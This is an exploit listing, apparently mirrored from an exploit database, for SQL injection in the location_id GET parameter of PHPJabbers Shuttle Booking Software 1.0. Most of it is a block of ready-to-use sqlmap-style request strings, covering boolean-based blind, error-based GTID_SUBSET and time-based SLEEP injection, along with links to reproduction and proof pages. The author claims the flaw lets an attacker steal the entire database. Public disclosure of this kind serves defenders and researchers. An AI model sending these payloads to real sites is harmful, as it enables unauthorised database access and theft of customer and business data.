Share
## https://sploitus.com/exploit?id=PACKETSTORM:174581
## Title: Shuttle-Booking-Software-1.0 Multiple-SQLi  
## Author: nu11secur1ty  
## Date: 09/10/2023  
## Vendor: https://www.phpjabbers.com/  
## Software: https://www.phpjabbers.com/shuttle-booking-software/#sectionPricing  
## Reference: https://portswigger.net/web-security/sql-injection  
  
## Description:  
The location_id parameter appears to be vulnerable to SQL injection  
attacks. A single quote was submitted in the location_id parameter,  
and a database error message was returned. Two single quotes were then  
submitted and the error message disappeared.  
The attacker easily can steal all information from the database of  
this web application!  
WARNING! All of you: Be careful what you buy! This will be your responsibility!  
  
STATUS: HIGH-CRITICAL Vulnerability  
  
[+]Payload:  
```mysql  
---  
Parameter: location_id (GET)  
Type: boolean-based blind  
Title: AND boolean-based blind - WHERE or HAVING clause  
Payload: controller=pjFrontPublic&action=pjActionGetDropoffs&index=348&location_id=3''')  
AND 1347=1347 AND ('MVss'='MVss&traveling=from  
  
Type: error-based  
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or  
GROUP BY clause (GTID_SUBSET)  
Payload: controller=pjFrontPublic&action=pjActionGetDropoffs&index=348&location_id=3''')  
AND GTID_SUBSET(CONCAT(0x716b786a71,(SELECT  
(ELT(9416=9416,1))),0x71706b7071),9416) AND  
('dOqc'='dOqc&traveling=from  
  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: controller=pjFrontPublic&action=pjActionGetDropoffs&index=348&location_id=3''')  
AND (SELECT 1087 FROM (SELECT(SLEEP(15)))poqp) AND  
('EEYQ'='EEYQ&traveling=from  
---  
```  
  
## Reproduce:  
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Shuttle-Booking-Software-1.0)  
  
## Proof and Exploit:  
[href](https://www.nu11secur1ty.com/2023/09/shuttle-booking-software-10-multiple.html)  
  
## Time spent:  
01:47:00